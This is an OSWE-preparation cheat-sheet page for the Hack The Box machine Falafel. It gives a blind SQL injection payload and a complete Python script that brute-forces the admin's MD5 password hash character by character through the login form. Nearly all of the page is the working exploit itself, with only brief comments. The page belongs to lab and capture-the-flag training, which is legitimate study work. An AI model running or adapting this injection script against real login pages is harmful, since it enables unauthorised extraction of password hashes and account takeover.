> For the complete documentation index, see [llms.txt](https://b1tbyte.gitbook.io/cheatsheets/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://b1tbyte.gitbook.io/cheatsheets/oswe/oswe-preparation-machines/blind-sqli-falafel-htb.md).

# Blind SQLi : Falafel (HTB)

* **Script Description:** the script is automating the extracting of admin's hash using Blind SQli payload
* **Payload** : `admin' and substring(password, 1, 1) = '0' -- -`
* **Machine:** HTB machine, Falafel
* **Output:**

![](/files/bt6HMmoHK0xoWCo01Z0i)

```python
import requests 

loginPage = '<http://10.10.10.73/login.php>'
extractedHash = ''
# Loop 32 times - length of the MD5 hash 
i = 1
while i <= 32 :
    # Loop over the MD5 character set
    MD5Characters = "abcdef0123456789" 
    for char in MD5Characters:
        # injection into username parameter, each time we brute force the current hash character
        parameters = {'username': "admin' and substring(password, "+str(i)+", 1) = '"+ char + "' -- -",'password':''}
        # save the response into an object
        response = requests.post(loginPage,data=parameters)
        # getting the html content from response object
        html =  response.text
        # Check BlindSQLi Cases : 
        # 1 - "Try again" case: is the false case for BlindSQLi (injected the wrong hash char, so we will skip this char) 
        # 2 - In else case: the application will response with "Wrong identification", which means we used the correct username, and the injected char is used in user password hash , so we will save this char into a variable
        if (html.find("Try again..") != -1):
            #print("False Case")
            pass
        else:
            #print("True Case")
            print("[+] Current Position is %d and the Extracted Char is %s " %(i,char))
            extractedHash += char
            break
    i+=1    
print ("[++] The hash of the admin user is :" + extractedHash)
```
